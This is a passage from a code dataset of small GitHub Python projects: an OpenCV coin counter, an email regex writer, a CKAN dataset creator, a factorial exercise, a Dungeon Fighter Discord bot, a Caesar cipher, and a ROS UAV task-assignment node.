[0.721,\t0.844,\t0.943,\t0.885,\t1.000,\t1.082,\t1.033,\t1.082],\n [0.667,\t0.780,\t0.871,\t0.818,\t0.924,\t1.000,\t0.955,\t1.000],\n [0.698,\t0.817,\t0.913,\t0.857,\t0.968,\t1.048,\t1.000,\t1.048],\n [0.667,\t0.780,\t0.871,\t0.818,\t0.924,\t1.000,\t0.955,\t1.000]\n])\n# increasing the power to enlarge the saclings diffrence. 
works best with 2 euro coins\nfor x in range(0, len(diffrence)):\n for y in range(0, len(diffrence[0])):\n diffrence[x][y] = diffrence[x][y]**power\n\n# colour spaces that the system works in\nicol = []\nicolC = (8, 41, 0, 19, 255, 255) # Copper\nicolY = (20, 31, 0, 35, 255, 255) # Yellow\nicolS = (20, 28, 0, 31, 70, 255) # Silver\nicol.append([icolC, icolY, icolS])\n\ncv2.namedWindow('colorTest')\n\n# list of images\n\nimages = [\n ['Coins/Coin1.jpg', 0]\n ['Coins/Coin2.jpg', 0],\n ['Coins/Coin3.jpg', 0],\n ['Coins/Coin4.jpg', 0],\n ['Coins/Coin5.jpg', 0]\n]\n\nfor pic in range(0, len(images)):\n loc = images[pic][0]\n frame = cv2.imread(loc)\n\n framecopy = copy.copy(frame)\n\n frameBGR = cv2.GaussianBlur(frame, (7, 7), 0)\n frameBGR = cv2.medianBlur(frameBGR, 15)\n\n hsv = cv2.cvtColor(frameBGR, cv2.COLOR_BGR2HSV)\n\n kernal = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (10, 10))\n circles1 = get_circles(hsv, icol[images[pic][1]][0], kernal, 80, 140)\n circles2 = get_circles(hsv, icol[images[pic][1]][1], kernal, 100, 140)\n circles3 = get_circles(hsv, icol[images[pic][1]][2], kernal, 100, 140)\n\n data = []\n error = 25\n # extract all copper coins out the list\n for c in circles1[0, :]:\n data.append([c[2], 'C', 1.0, c[0], c[1]])\n # extract all messing coins out the list\n for c in circles2[0, :]:\n\n data.append([c[2], 'Y', 1.0, c[0], c[1]])\n # look trough the list of messing coins that are actually silver\n for d in data:\n if (d[1] == 'Y'):\n for c in circles3[0, :]:\n if(c[0]-error < d[3] and d[3] < c[0]+error and\n c[1]-error < d[4] and d[4] < c[1]+error):\n d[1] = 'S'\n\n # find smallest and largest in picture\n sizesave = [data[0][0], data[1][0]]\n locationsave = [0, 1]\n for x in range(0, len(data)):\n if (data[x][0] < sizesave[0]):\n sizesave[0] = data[x][0]\n locationsave[0] = x\n elif (data[x][0] > sizesave[1]):\n sizesave[1] = data[x][0]\n locationsave[1] = x\n\n for x in range(0, len(data)):\n data[x][2] = (data[locationsave[1]][0]/data[x][0])**power\n\n circles = np.hstack((circles1, circles2))\n temp = copy.deepcopy(diffrence)\n lowest = 1\n ysave = 7\n\n # find what collum there needs to be worked in\n for x in range(0, len(diffrence)):\n for y in range(0, len(diffrence[0])):\n temp[x][y] = abs(diffrence[x][y]-data[locationsave[0]][2])\n if (abs(temp[x][y]) < lowest):\n ysave = y\n lowest = abs(temp[x][y])\n\n tempvalue = 0\n typesave = 0\n # Identify coin and add to som\n for n in range(0, len(data)):\n lowest = 10000000\n if (data[n][1] == 'C'):\n for x in range(0, 3):\n tempvalue = diffrence[x][ysave]-data[n][2]\n if (abs(tempvalue) < lowest):\n lowest = abs(tempvalue)\n typesave = x\n elif (data[n][1] == 'Y'):\n for x in range(3, 6):\n tempvalue = diffrence[x][ysave]-data[n][2]\n if (abs(tempvalue) < lowest):\n lowest = abs(tempvalue)\n typesave = x\n elif (data[n][1] == 'S'):\n for x in range(6, 8):\n tempvalue = diffrence[x][ysave]-data[n][2]\n if (abs(tempvalue) < lowest):\n lowest = abs(tempvalue)\n typesave = x\n data[n].append(coins[typesave][0])\n data[n].append(coins[typesave][1])\n data[n].append(lowest)\n data[n].append(typesave)\n counter = 0\n value = 0\n\n for i in circles1[0, :]:\n cv2.circle(frameBGR, (i[0], i[1]), i[2], (0, 255, 0), 2)\n cv2.circle(frameBGR, (i[0], i[1]), 2, (0, 0, 255), 3)\n for i in circles[0, :]:\n cv2.circle(framecopy, (i[0], i[1]), i[2], (0, 255, 0), 2)\n cv2.circle(framecopy, (i[0], i[1]), 2, (0, 0, 255), 3)\n\n cv2.putText(framecopy, \"coin : {}, {}\".format(counter, data[counter][5]),\n (i[0], i[1]),\n font,\n fontScale,\n 
fontColor,\n lineType)\n value += data[counter][6]\n counter += 1\n\n # print found value of coins\n print(\"found: {:5.2f} Euro worth of coins\".format(value))\n\n # show results\n\n framecopy = cv2.resize(framecopy, (0, 0), fx=resize*2.5, fy=resize*2.5)\n cv2.imshow('found', framecopy)\n frameBGR = cv2.resize(frameBGR, (0, 0), fx=resize, fy=resize)\n cv2.imshow('blurred', frameBGR)\n cv2.imwrite((images[pic][0][:-4]+\"_found\"+images[pic][0][-4:]), framecopy)\n\n k = cv2.waitKey(5) & 0xFF\n if k == 27:\n break\n\n# cv2.destroyAllWindows()\n","repo_name":"peacefighter1996/Coin_Recognition","sub_path":"Coin_detection.py","file_name":"Coin_detection.py","file_ext":"py","file_size_in_byte":7350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"1942502034","text":"import re\nstr = '''rakesh@gamil.com, rocky@gammil.com, rakesh.rr@gmail.com, rakesh.rr.rr@gmail.com'''\nf1 = open(\"f1.txt\", 'w')\nf1.write(\"\")\nf1.close()\nf1 = open(\"f1.txt\", 'a')\nl = re.findall('\\S+@\\S+',str)\nz=0\nfor i in l:\n z+=1\n f1.write(f\"Email{z}:{i}\\n\") \nf1.close()","repo_name":"rakesh-201/Python-course","sub_path":"r_EmailCollector.py","file_name":"r_EmailCollector.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"28436317343","text":"### användning från commandline , samt avrundas med att printa ut dataset-id - obs namn på dataset måste vara små bokstäver, korrigerar med hjälp av title nedan (): python skapa_paket_med_variabler.py dreamdataset \"Vårt dataset är bäst\"\r\n\r\nfrom ckanapi import RemoteCKAN, NotAuthorized, NotFound,ValidationError, SearchQueryError, SearchError, CKANAPIError, ServerIncompatibleError\r\nimport sys\r\n\r\n## variabler ##\r\nnamn = str(sys.argv[1])\r\nbeskrivning = str(sys.argv[2])\r\norganisation = ''\r\nlicens = 'cc-0'\r\nutgivare = ''\r\nmail = ''\r\nstatus = 'http://publications.europa.eu/resource/authority/access-right/PUBLIC'\r\nkontakt = ''\r\nsprak = 'http://publications.europa.eu/resource/authority/language/SWE'\r\ntema = 'http://publications.europa.eu/resource/authority/data-theme/SOCI'\r\nfrekvens = 'http://publications.europa.eu/resource/authority/frequency/ANNUAL'\r\ntitel = namn.title()\r\n\r\n#api-variabler#\r\n\r\nua = 'ckanapimalmo/1.0 (+https://ckan-malmo.dataplatform.se)'\r\nmalmoapi = RemoteCKAN('https://ckan-malmo.dataplatform.se/', user_agent=ua, apikey='')\r\n\r\n## skapa tomt dataset ###\r\ntry:\r\n malmoapi.action.package_create(\r\n package_id = namn,\r\n name = namn ,\r\n notes = beskrivning,\r\n owner_org = organisation,\r\n license_id = licens,\r\n author = utgivare,\r\n author_email = mail,\r\n #private = 'false',\r\n access_rights = status,\r\n contact_name = kontakt,\r\n language = sprak,\r\n theme = tema,\r\n # for a list of themes check https://docs.dataportal.se/dcat/en/#5.3\r\n frequency = frekvens,\r\n title = titel)\r\n \r\nexcept (NotAuthorized, NotFound,ValidationError, SearchQueryError, SearchError, CKANAPIError, ServerIncompatibleError) as e:\r\n print (e)\r\n print (e.args)\r\n\r\n\r\npaketinfo = malmoapi.call_action('package_show', {'id': namn})\r\nidinfo = paketinfo['id']\r\nprint(\"Paket är skapat med id: \" + 
idinfo)\r\n\r\n\r\n","repo_name":"mwigge/ckan","sub_path":"python/skapa_paket_med_variabler.py","file_name":"skapa_paket_med_variabler.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"sv","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"20542958877","text":"'''\r\n작성일:2023년 9월 27일\r\n작성자:202095109 양사호\r\n설명:반복문으로 펙토리얼 구하기.\r\n 오늘의 마지막 문제\r\n'''\r\n\r\nnum=int(input(\"num:\"))\r\nfact=1\r\n\r\nfor i in range(num):\r\n fact=fact*(i+1)\r\n\r\nprint(f\"{num}! is {fact}\")","repo_name":"MuLVenus/python","sub_path":"202095109/5장/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"38549084665","text":"import discord\nfrom discord.ext import commands\nimport requests\nimport json\nimport random\nfrom selenium import webdriver\nimport server_name_converter\nimport time\nimport os\n\n\napp = commands.Bot(command_prefix=\"#\")\n\ndiscord_api_key = os.environ.get('discord_api_key')\nneople_api_key = os.environ.get('neople_api_key')\n\nbrowser_options = webdriver.ChromeOptions()\nbrowser_options.add_argument('headless')\nbrowser_options.add_argument('window-size=1920x1080')\nbrowser_options.add_argument(\"disable-gpu\")\nbrowser_options.add_argument('--no-sandbox')\n\nbrowser_options.binary_location = os.environ.get(\"GOOGLE_CHROME_BIN\")\nbrowser = webdriver.Chrome(executable_path=os.environ.get(\"CHROMEDRIVER_PATH\"), chrome_options=browser_options)\n\n\n@app.event\nasync def on_ready():\n print(\"다음으로 로그인합니다: \", end=\"\")\n print(app.user.name)\n print(\"Connection was successful. \")\n await app.change_presence(status=discord.Status.online, activity=discord.Game(\"던전앤파이터\"))\n\n\n@app.command(name='명령어')\nasync def help_command(ctx):\n embed = discord.Embed(title='명령어를 알려줄게!', color=discord.Color.blue())\n embed.set_thumbnail(url='https://www.city.kr/files/attach/images/161/715/991/005/169199853332e0e576fd914f085c0b5a.gif')\n embed.add_field(name='#딜', value='1시딜을 알려줍니다.\\nex) #딜 $P 또는 #딜 카인 $P\\n서버명을 입력하지 않으면 카인 서버로 검색', inline=False)\n embed.add_field(name='#버프력', value='버프력을 알려줍니다.\\nex) #버프력 오야븜미 또는 #버프력 카인 오야븜미\\n서버명을 입력하지 않으면 카인 서버로 검색', inline=False)\n embed.add_field(name='#닉', value='사용 가능한 닉네임의 서버를 알려줍니다..\\nex) #닉 $P', inline=False)\n embed.add_field(name='#머먹지', value='메뉴를 추천해줍니다.', inline=False)\n embed.add_field(name='#닉넴수', value='던파 서버에서 사용중인 닉네임 수를 알려줍니다.', inline=False)\n await ctx.send(embed=embed)\n\n\n@app.command(name='핑')\nasync def ping(ctx, number: int):\n await ctx.send(number)\n\n\n@app.command(name='잘자')\nasync def ping(ctx):\n await ctx.send('https://blogimg.goo.ne.jp/user_image/44/3a/b2ec2e835264fc5abae347e8721f1748.gif')\n\n\n@app.command(name='화이팅')\nasync def ping(ctx):\n await ctx.send('https://media.tenor.com/images/da43d28ce922ccf6c36359c11ead912d/tenor.gif')\n\n\n@app.command(name='박수')\nasync def ping(ctx):\n await ctx.send('와! 
짝짝짝!!')\n\n\n@app.command(name=\"머먹지\")\nasync def random_menu(ctx):\n lst = [\"피자\", \"치킨\", \"마라탕\", \"찜닭\", \"라면\", \"굶어\", \"햄버거\", \"홍어\", \"토끼구이\", \"떡볶이\", \"족발\", \"중국집\", \"빵과 우유\", \"돈까스\", \"불고기\"]\n await ctx.send(lst[random.randrange(0, len(lst))]+\" ㅇㅅㅇ\")\n\n\n@app.command(name='스샷')\nasync def get_character_image(ctx, *input: str):\n if len(input) is 1:\n char_name = str(input[0])\n URL = \"https://api.neople.co.kr/df/servers/cain/characters?characterName=\"\n URL += char_name\n URL += neople_api_key\n response = requests.get(URL).text\n new_response = response.replace(\"'\", \"\\\"\")\n dict_data = (json.loads(new_response)).get('rows')[0]\n char_id = dict_data.get('characterId')\n picture = 'https://img-api.neople.co.kr/df/servers/cain/characters/'+char_id+'?zoom=2'\n embed = discord.Embed(title=dict_data.get('characterName'), color=discord.Color.blue())\n embed.set_image(url=picture)\n\n await ctx.send(embed=embed)\n\n else:\n server_kor = str(input[0])\n char_name = str(input[1])\n server_eng = server_name_converter.to_eng(server_kor)\n\n URL = \"https://api.neople.co.kr/df/servers/\"\n URL += server_eng\n URL += \"/characters?characterName=\"\n URL += char_name\n URL += neople_api_key\n response = requests.get(URL).text\n new_response = response.replace(\"'\", \"\\\"\")\n dict_data = (json.loads(new_response)).get('rows')[0]\n char_id = dict_data.get('characterId')\n picture = 'https://img-api.neople.co.kr/df/servers/'+server_eng+'/characters/'+char_id+'?zoom=2'\n embed = discord.Embed(title=dict_data.get('characterName'), color=discord.Color.blue())\n embed.set_image(url=picture)\n\n await ctx.send(embed=embed)\n\n\n@app.command(name='닉넴수')\nasync def how_many_nicknames(ctx, input: str):\n URL = \"https://api.neople.co.kr/df/servers/all/characters?characterName=\"\n URL += input\n URL += neople_api_key\n response = requests.get(URL).text\n new_response = response.replace(\"'\", \"\\\"\")\n dict_data = json.loads(new_response)\n await ctx.send(\"[\"+input+\"] 의 닉네임 개수는 \"+str(len(dict_data.get('rows')))+\"개에요 ㅇㅅㅇ\")\n\n\n@app.command(name='닉')\nasync def how_many_nicknames(ctx, input: str):\n URL = \"https://api.neople.co.kr/df/servers/all/characters?characterName=\"\n URL += input\n URL += neople_api_key\n response = requests.get(URL).text\n new_response = response.replace(\"'\", \"\\\"\")\n dict_data = (json.loads(new_response)).get('rows')\n server_list = ['cain', 'diregie', 'siroco', 'prey', 'casillas', 'hilder', 'anton', 'bakal']\n for data in dict_data:\n server_list.remove(data.get('serverId'))\n # 사용가능 서버명을 한글로 바꾸기\n server_list_kor = []\n for a in server_list:\n if 'cain' in a:\n server_list_kor.append(\"카인\")\n if 'diregie' in a:\n server_list_kor.append(\"디레지에\")\n if 'siroco' in a:\n server_list_kor.append(\"시로코\")\n if 'prey' in a:\n server_list_kor.append(\"프레이\")\n if 'casillas' in a:\n server_list_kor.append(\"카시야스\")\n if 'hilder' in a:\n server_list_kor.append(\"힐더\")\n if 'anton' in a:\n server_list_kor.append(\"안톤\")\n if 'bakal' in a:\n server_list_kor.append(\"바칼\")\n if len(server_list_kor) == 0:\n await ctx.send(\"닉네임 [\"+input+\"]은 사용이 불가능해요... 
ㅇㅅㅇ\")\n else:\n await ctx.send(\"닉네임 [\"+input+\"]을 쓸 수 있는 서버에요 ㅇㅅㅇ\\n\"+str(server_list_kor))\n\n\n@app.command(name='딜')\nasync def get_deal(ctx, *input: str):\n if len(input) is 1:\n char_name = str(input[0])\n URL = \"https://api.neople.co.kr/df/servers/cain/characters?characterName=\"\n URL += char_name\n URL += neople_api_key\n response = requests.get(URL).text\n new_response = response.replace(\"'\", \"\\\"\")\n dict_data = (json.loads(new_response)).get('rows')[0]\n char_id = dict_data.get('characterId')\n\n DUNOFF = \"https://dunfaoff.com/SearchResult.df?server=cain&characterid=\"\n DUNOFF += char_id\n\n print(\"던오프 요청 ->\"+DUNOFF)\n\n browser.get(DUNOFF)\n browser.implicitly_wait(1)\n browser.find_element_by_xpath('//*[@id=\"damage_side\"]').click()\n browser.implicitly_wait(1)\n browser.find_element_by_xpath('//*[@id=\"skill_damage\"]/ul/li[4]').click()\n browser.implicitly_wait(1)\n browser.find_element_by_xpath('//*[@id=\"skill_damage\"]/div[2]/div[2]/div/label[3]').click()\n browser.implicitly_wait(2)\n output = browser.find_element_by_class_name('sinergeDmg1').text\n browser.get(DUNOFF)\n\n _output_num = int(output.replace(',', ''))\n if _output_num >= 100000000:\n await ctx.send(\"[카인 - \"+char_name+\"]님의 딜은 [\"+str(int(_output_num/100000000))+\"억] 이에요!!! ㅇㅅㅇ\")\n else:\n await ctx.send(\"[카인 - \"+char_name+\"]님의 딜은 [\"+output+\"] 에요!!! ㅇㅅㅇ\")\n else:\n server_kor = str(input[0])\n char_name = str(input[1])\n server_eng = server_name_converter.to_eng(server_kor)\n\n URL = \"https://api.neople.co.kr/df/servers/\"\n URL += server_eng\n URL += \"/characters?characterName=\"\n URL += char_name\n URL += neople_api_key\n response = requests.get(URL).text\n new_response = response.replace(\"'\", \"\\\"\")\n dict_data = (json.loads(new_response)).get('rows')[0]\n char_id = dict_data.get('characterId')\n\n DUNOFF = \"https://dunfaoff.com/SearchResult.df?server=\"\n DUNOFF += server_eng\n DUNOFF += \"&characterid=\"\n DUNOFF += char_id\n\n print(\"던오프 요청 ->\"+DUNOFF)\n\n browser.get(DUNOFF)\n browser.implicitly_wait(1)\n browser.find_element_by_xpath('//*[@id=\"damage_side\"]').click()\n browser.implicitly_wait(1)\n browser.find_element_by_xpath('//*[@id=\"skill_damage\"]/ul/li[4]').click()\n browser.implicitly_wait(1)\n browser.find_element_by_xpath('//*[@id=\"skill_damage\"]/div[2]/div[2]/div/label[3]').click()\n browser.implicitly_wait(2)\n output = browser.find_element_by_class_name('sinergeDmg1').text\n browser.get(DUNOFF)\n\n _output_num = int(output.replace(',', ''))\n if _output_num >= 100000000:\n await ctx.send(\"[카인 - \"+char_name+\"]님의 딜은 [\"+str(int(_output_num/100000000))+\"억] 이에요!!! ㅇㅅㅇ\")\n else:\n await ctx.send(\"[\" + server_kor + \" - \" + char_name + \"]님의 딜은 [\" + output + \"] 에요!!! 
ㅇㅅㅇ\")\n\n\n@app.command(name='버프력')\nasync def get_deal(ctx, *input: str):\n if len(input) is 1:\n char_name = str(input[0])\n URL = \"https://api.neople.co.kr/df/servers/cain/characters?characterName=\"\n URL += char_name\n URL += neople_api_key\n response = requests.get(URL).text\n new_response = response.replace(\"'\", \"\\\"\")\n dict_data = (json.loads(new_response)).get('rows')[0]\n char_id = dict_data.get('characterId')\n\n DUNOFF = \"https://dunfaoff.com/SearchResult.df?server=cain&characterid=\"\n DUNOFF += char_id\n\n print(\"던오프 요청 ->\"+DUNOFF)\n\n browser.get(DUNOFF)\n browser.implicitly_wait(1)\n browser.find_element_by_xpath('//*[@id=\"holy_buff_side\"]').click()\n browser.implicitly_wait(1)\n output = browser.find_element_by_xpath('//*[@id=\"holy_buff_list\"]/div[1]/div[2]/div[10]/div/a').text\n browser.get(DUNOFF)\n await ctx.send(\"[카인 - \"+char_name+\"]님의 버프력은 [\"+output+\"] 에요!!! ㅇㅅㅇ\")\n else:\n server_kor = str(input[0])\n char_name = str(input[1])\n server_eng = server_name_converter.to_eng(server_kor)\n\n URL = \"https://api.neople.co.kr/df/servers/\"\n URL += server_eng\n URL += \"/characters?characterName=\"\n URL += char_name\n URL += neople_api_key\n response = requests.get(URL).text\n new_response = response.replace(\"'\", \"\\\"\")\n dict_data = (json.loads(new_response)).get('rows')[0]\n char_id = dict_data.get('characterId')\n\n DUNOFF = \"https://dunfaoff.com/SearchResult.df?server=\"\n DUNOFF += server_eng\n DUNOFF += \"&characterid=\"\n DUNOFF += char_id\n\n print(\"던오프 요청 ->\"+DUNOFF)\n\n browser.get(DUNOFF)\n browser.implicitly_wait(1)\n browser.find_element_by_xpath('//*[@id=\"holy_buff_side\"]').click()\n browser.implicitly_wait(1)\n output = browser.find_element_by_xpath('//*[@id=\"holy_buff_list\"]/div[1]/div[2]/div[10]/div/a').text\n browser.get(DUNOFF)\n await ctx.send(\"[\"+server_kor+\" - \" + char_name + \"]님의 버프력은 [\" + output + \"] 에요!!! ㅇㅅㅇ\")\n\n\n@app.command(name=\"시세\")\nasync def find_items_in_auction(ctx, *input: str):\n URL = \"https://api.neople.co.kr/df/auction?itemName=\"\n for a in input:\n URL += \"+\"+str(a)\n URL +=\"&limit=3&sort=unitPrice:asc&wordType=full\"\n URL += neople_api_key\n print(\"URL ->\"+URL)\n response = requests.get(URL).text\n new_response = response.replace(\"'\", \"\\\"\")\n arr_data = (json.loads(new_response)).get('rows')\n if arr_data is None:\n await ctx.send(\"검색어를 다르게 한번... 해보심이... 
ㅇㅅㅇ\")\n else:\n embed = discord.Embed(title='아이템 검색 결과 (베타)', color=discord.Color.blue())\n embed.set_thumbnail(url=(\"https://img-api.neople.co.kr/df/items/\"+arr_data[0].get('itemId')))\n for data in arr_data:\n embed.add_field(name=data.get('itemName'), value='가격: '+str(data.get('unitPrice'))+'골드, 개수'+str(data.get('count'))+'개', inline=False)\n await ctx.send(embed=embed)\n\n\n@app.command(name=\"오늘\")\nasync def what_day_today(ctx):\n t = [\"월요일 : 헬이나 도세요\", \"화요일 : 헬이나 도세요\", \"수요일 : 홍옥의 저주\", \"목요일 : 오큘러스, 산맥, 마대, 조안 페레로 3종던전\", \"금요일 : 오큘러스, 산맥, 마대\", \"토요일 : 레이드\", \"일요일 : 레이드\"]\n n = time.localtime().tm_wday\n await ctx.send(\"오늘은 \"+t[n])\n\n\napp.run(discord_api_key)\n","repo_name":"MinHeum/moon_rabbit","sub_path":"moon_rabbit.py","file_name":"moon_rabbit.py","file_ext":"py","file_size_in_byte":12941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"33791408233","text":"from art import logo\n\n\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y',\n 'z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\n\ndef caesar(start_text, shift_amount, cipher_direction):\n end_text = \"\"\n if cipher_direction == \"decode\":\n shift_amount *= -1\n for char in start_text:\n # Se deja como char el caractér de el alfabeto para cuando uno ingrese un elemento\n # que no existe en el alfabeto, se mantenga. Como un espacio o un signo.\n if char in alphabet:\n position = alphabet.index(char)\n new_position = position + shift_amount\n end_text += alphabet[new_position]\n else:\n end_text += char\n print(f\"Here's the {cipher_direction}d result: {end_text}\")\n\n\n# Se importa el logo desde el módulo art.\nprint(logo)\n\n# Se deja una variable en False, para que el ciclo se siga ejecutando\n# Se hacen las mismas preguntas que son la dirección, o sea, encriptar o decifrar el código\n# y luego cuantas letras se moverán, dependiendo de lo anterior\n# Finalmente, si en la última pregunta para continuar se dice que 'no', se termina el programa.\n# De otra manera, se sigue ejecutando.\nshould_end = False\nwhile not should_end:\n\n direction = input(\"Type 'encode' to encrypt, type 'decode' to decrypt:\\n\")\n text = input(\"Type your message:\\n\").lower()\n shift = int(input(\"Type the shift number:\\n\"))\n# Se hace el módulo por 26 que son las letras del abecedario para que no se salga de la lista.\n# Igual se mantiene dos alfabetos dentro de la primera lista 'alphabet'.\n shift = shift % 26\n\n caesar(start_text=text, shift_amount=shift, cipher_direction=direction)\n\n restart = input(\n \"Type 'yes' if you want to go again. Otherwise type 'no'.\\n\")\n if restart == \"no\":\n should_end = True\n print(\"Adiós.\")\n","repo_name":"OneCalledFrank/Python100Days","sub_path":"Day 8/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"42933723001","text":"#! 
/usr/bin/env python3\n# coding=utf-8\n\n\nimport rospy\nfrom numpy import array, insert\nfrom scipy.optimize import linear_sum_assignment\nfrom modified_hungarian import unbalanced_assignment\n\nfrom std_msgs.msg import Int16\nfrom decision_maker.msg import Value, IdList, SwarmInfo\n\n\nclass CenterObj:\n def __init__(self, uav_num, swarm_id=-1):\n self.uav_num = uav_num\n self.swarm_id = swarm_id\n\n self.uav_chg_flag = False # 当集群内的无人机发生变化时转为True\n self.tar_chg_flag = False # 当目标发生变化时转为True\n\n self.assigned_talk_dict = {} # {uid: rospy.Publisher(uid, ...)} 中心对每个无人机的Publisher对象\n self.assigned_result_dict = {} # {uid: IdList()} 中心传回无人机的指派结果\n self.uid_set = set() # 指派算法开始时中心接收到了这些无人机发来的(对目标的)评估值,指派完成后clear()\n self.tid_set = set() # 指派算法开始时中心接收到了这些目标的评估值,指派完成后clear()\n self.uid_tnum_dict = {} # {uid: tar_num} 在上次运行指派算法时无人机uid发来中心的目标数量\n self.uid_tfd_dict = {} # {uid: {tid: fit}} 无人机uid发来中心的关于目标tid的评估值fit\n\n self.swarm_info_dict = {} # {uid: send_times} 无人机发来的其uid的次数,用于判断集群内有哪些无人机\n self.id_check_mult = 0.5 # 某无人机发送其ID的次数少于最大次数的该倍数时认为离开本群体\n self.center_info_talker = rospy.Publisher('center_info', SwarmInfo, queue_size=10)\n self.swarm_info_listener = rospy.Subscriber('swarm_info', SwarmInfo, self.swarm_info_update)\n # self.swarm_check_timer = rospy.Timer(rospy.Duration(0.5), self.swarm_info_check)\n\n fit_str = 'fitness' + str(self.swarm_id) if self.swarm_id >= 0 else 'fitness'\n self.fitness_listen = rospy.Subscriber(\n fit_str,\n Value,\n self.fitness_callback)\n\n self.assign_timer = rospy.Timer(rospy.Duration(0.5), self.assign_callback)\n\n def swarm_info_update(self, msg):\n if msg.swarm_id != self.swarm_id:\n return\n try:\n self.swarm_info_dict[msg.data] += 1\n except KeyError:\n self.swarm_info_dict[msg.data] = 1\n self.uav_chg_flag = True\n cen_msg = SwarmInfo()\n cen_msg.data = msg.data\n cen_msg.swarm_id = self.swarm_id\n self.center_info_talker.publish(cen_msg)\n\n def swarm_info_check(self, msg=None):\n if not self.swarm_info_dict:\n return\n std_times = max(self.swarm_info_dict.values())\n clear_list = []\n for uid in self.swarm_info_dict:\n if self.swarm_info_dict[uid] < std_times * self.id_check_mult:\n clear_list.append(uid)\n else:\n self.swarm_info_dict[uid] = 0\n for uid in clear_list:\n self.swarm_info_dict.pop(uid)\n try:\n self.uid_set.remove(uid)\n except KeyError:\n pass\n if self.uav_num != len(self.swarm_info_dict):\n self.uav_chg_flag = True\n self.uav_num = len(self.swarm_info_dict)\n\n def fitness_callback(self, msg):\n if msg.swarm_id != self.swarm_id:\n return\n if msg.uav_id not in self.assigned_talk_dict:\n assigned_talk = rospy.Publisher(\n 'assign_result'+str(msg.uav_id),\n IdList, # target_id_list\n queue_size=10)\n self.assigned_talk_dict[msg.uav_id] = assigned_talk\n self.assigned_result_dict[msg.uav_id] = IdList()\n if msg.fit_value_list: # 这个判断意味着当有目标被搜索到时,在当前群内的无人机都需要发送非空的评估值表,这样才算接收到了该无人机的评估值\n self.uid_set.add(msg.uav_id)\n # 检查目标是否有变化分为两步,第一步检查是否有新目标\n for tid, fit in zip(msg.tar_id_list, msg.fit_value_list):\n try:\n if tid not in self.uid_tfd_dict[msg.uav_id]:\n self.tar_chg_flag = True\n self.uid_tfd_dict[msg.uav_id][tid] = fit\n except KeyError:\n self.uid_tfd_dict[msg.uav_id] = {tid: fit}\n self.uav_chg_flag = True\n self.tid_set.add(tid)\n # 第二步检查无人机传给中心的目标数有无变化\n try:\n if self.uid_tnum_dict[msg.uav_id] != len(msg.tar_id_list):\n self.tar_chg_flag = True\n except KeyError:\n self.uav_chg_flag = True\n finally:\n self.uid_tnum_dict[msg.uav_id] = len(msg.tar_id_list)\n\n def assign_callback(self, msg):\n self.swarm_info_check()\n # 
print('uavnum', self.uav_num)\n # print(0, self.uav_chg_flag, self.tar_chg_flag, len(self.uid_set), self.uav_num, self.swarm_info_dict.keys(), self.uid_set, self.tid_set)\n if (self.uav_chg_flag or self.tar_chg_flag) and (len(self.uid_set) == self.uav_num and self.swarm_info_dict.keys() == self.uid_set): # 判断无人机与目标是否变化and群内无人机是否都将评估值传到中心\n # print(1, self.uav_chg_flag, self.tar_chg_flag, len(self.uid_set), self.uav_num, self.swarm_info_dict.keys(), self.uid_set, self.tid_set)\n # 当某个无人机发现一个新目标时,其他无人机还没收到新目标的消息,但运行了评估函数并publish了Value,这时会导致无人机的目标数不一致,在这进行处理\n max_fit = float('-inf')\n add_tuple_list = []\n for uid in self.uid_set:\n for tid in self.tid_set:\n if tid not in self.uid_tfd_dict[uid]:\n add_tuple_list.append((uid, tid))\n else:\n max_fit = self.uid_tfd_dict[uid][tid] if self.uid_tfd_dict[uid][tid] > max_fit else max_fit\n for _tup in add_tuple_list:\n self.uid_tfd_dict[_tup[0]][_tup[1]] = max_fit\n # 重置重分配条件标志位\n self.uav_chg_flag = False\n self.tar_chg_flag = False\n for u_i in self.assigned_result_dict:\n self.assigned_result_dict[u_i].target_id_list.clear()\n # 计算每个目标需要几架无人机\n try:\n assign_num = self.uav_num // len(self.tid_set)\n except ZeroDivisionError:\n assign_num = self.uav_num\n if assign_num < 1:\n assign_num = 1\n elif assign_num > self.uav_num // 2 and self.uav_num > 1:\n assign_num = self.uav_num // 2\n if assign_num < 2 and self.uav_num > 2:\n assign_num = 2\n # 生成价值矩阵\n tid_list = list(self.tid_set)\n uid_list = list(self.uid_set)\n assign_matrix = array([[self.uid_tfd_dict[uid][tid] for tid in tid_list] for uid in uid_list])\n # 任务分配算法\n # print(len(self.tid_set), self.uav_num, assign_num, 'assignnum')\n for _ in range(assign_num):\n if len(tid_list) <= len(uid_list):\n assign_uav, assign_tar = linear_sum_assignment(assign_matrix)\n else:\n assign_uav, assign_tar = unbalanced_assignment(assign_matrix)\n for ui, ti in zip(assign_uav, assign_tar):\n self.assigned_result_dict[uid_list[ui]].target_id_list.append(tid_list[ti])\n assign_matrix[ui][ti] += max_fit\n # for t_i in tid_list:\n # uid_list.sort(key=lambda x: self.uid_tfd_dict[x][t_i])\n # for r_i in range(assign_num):\n # u_i = uid_list[r_i]\n # self.assigned_result_dict[u_i].target_id_list.append(t_i)\n for a_talk, a_result in zip(self.assigned_talk_dict.values(), self.assigned_result_dict.values()):\n a_talk.publish(a_result)\n self.uid_set.clear()\n self.tid_set.clear()\n\n\ndef main():\n center_obj = CenterObj(uav_num=3)\n rospy.spin()\n\n\nif __name__ == '__main__':\n try:\n main()\n except rospy.ROSInterruptException:\n 